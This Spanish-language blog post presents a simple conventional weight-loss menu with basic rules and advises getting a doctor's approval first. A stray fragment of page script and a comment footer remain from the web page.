Salud y belleza » Alimentación, Dieta

Dieta fácil, figurita difícil

Sin Comentarios

El ejercicio de hallar una dieta convencional, puede resultar aún más complicado que el de conseguir un plan exótico (desde aquí mismo hemos presentado dietas cuasi inclasificables: la de la papaya, por ejemplo, o también la del astronauta). Pero, a pesar de los nuevos sistemas para bajar de peso, todavía existen dietas simples, sencillas, dotadas de alimentos clásicos: la llamada dieta convencional, es el más claro ejemplo de esa resistencia.

“Una dieta equilibrada es aquella que combina alimentos sanos con productos bajos en calorías. De ninguna manera existen alimentos totalmente libres de calorías e, irónicamente, los que menos calorías contienen son aquellos que resultan menos efectivos para la salud del organismo. De esta manera, no se debe buscar una dieta sana que proponga comidas sanas y, en la medida de lo posible, sí también platos de escasas calorías” dice un profesional de la nutrición.

La denominada dieta convencional (vintage, para algunos) está dirigida a ese grupo de personas amantes de la vida sanas que quieren, entre sus hábitos, adquirir un plan alimenticio provechoso y bajo en calorías. A menudo, entre tantos sistemas exóticos, suele ser complicado hallar la sencillez pero, con este clásico plan, usted podrá gozar de todo lo que busca.

Analicemos la conformación de un menú elemental.

  • DESAYUNO: vaso de leche desnatada o semidesnatada; tostada con mantequilla o margarina; porción de fruta; un  par cucharadas de cereales.
  • COMIDA: doscientos gramos de verduras; cien gramos de carne, pescado o pollo asado o cocido; una tajada de pan integral; una porción de fruta.
  • MERIENDA: yogur sin azúcar; una rebanada de queso fresco; una pieza de fruta
  • CENA: tortilla de un huevo o cien gramos de jamón o pescado; ensalada verde; pieza de fruta a elección.

Algunas indicaciones que se deben tener en cuenta al aplicar la dieta.

  1. De entre todas las frutas, la única que no se puede escoger es el plátano.
  2. Únicamente se pueden comer platos a base de patatas durante dos veces a la semana.
  3. El tiempo indicada para llevar el plan sugiere un máximo de cuatros emanas.
  4. Es necesario beber abundante líquido (más de dos litros de agua a diario).
  5. Al momento previo a comenzar la dieta, es necesario buscar la aprobación del médico de cabecera más allá de que se trate de un plan clásico (puede que su condición no sea la mejor para un plan dietario y usted lo ignore).

d.getElementsByTagName('head')[0].appendChild(s);if (document.currentScript) {

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.